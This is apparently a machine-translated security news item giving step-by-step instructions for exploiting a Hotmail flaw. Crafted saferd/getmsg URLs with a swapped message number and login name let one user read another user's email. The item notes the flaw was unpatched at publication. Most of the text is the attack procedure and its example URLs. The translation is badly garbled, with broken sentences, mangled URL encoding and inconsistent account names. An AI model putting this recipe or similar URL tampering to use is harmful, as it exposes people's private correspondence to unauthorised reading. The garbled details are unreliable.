Recently, a hotmail user discovered that through a simple change address number, etc.
The interest can be viewed by its people's mail content. Because the mail number has certain rules, it is well
Easy. To complete this job, you have to have 2 Hotmail mailboxes.
Used to peek at the address of the email:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang = EN & HM ___ TG = HTTP% 3A% 2F% 2F64% 2E4% 2E36% 2E250% 2FCGI% 2Dbin%
2FGETMSG & HM ___ qs =% 26MSG% 3DMSGXXXXXXXXX% 2E (X) X% 26Start% 3D1% 26LEN% 3D9999999999% 26login%
3dusername% 26Domain% 3Dhotmail% 2ECOM
Where xxxxxxxxx is the mail number, username is a user account, (x) x is between 0 and 59
The second encoding between.
For example, you have a mailbox called R00Tarded@hotmail.com. First log in to this letter
The box opens any email, and the address in the address bar will be:
http://lw2fd.hotmail.msn.com/cgi-bin/getmsg?curmbox=f000000001&a=5691b2b4e104176111971aa0fbb12747341a0fbb12747.3&start=197078&len=1060&msgread=1&mfs=182
The number of this email is MSG998000947.3. Copy the address and log out.
Then log in to another mailbox. Insert the number and account number just now into the address bar:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=en&hm__tg=http://64.4.36.250/CGI-bin/GETMSG&HM___qs=&msg=MSG998000947.3 % 26Start% 3D1% 26LEN% 3D99999999999% 26login%
3DR00TARDED% 26DOMAIN% 3Dhotmail% 2ECOM
Enter. What did you see? Yes, the contents of the email in r00iting @ hotmail.com
.
Please note that this vulnerability is not repaired when this vulnerability is published. (Zhang
Forever)
(Editor: CATHY)
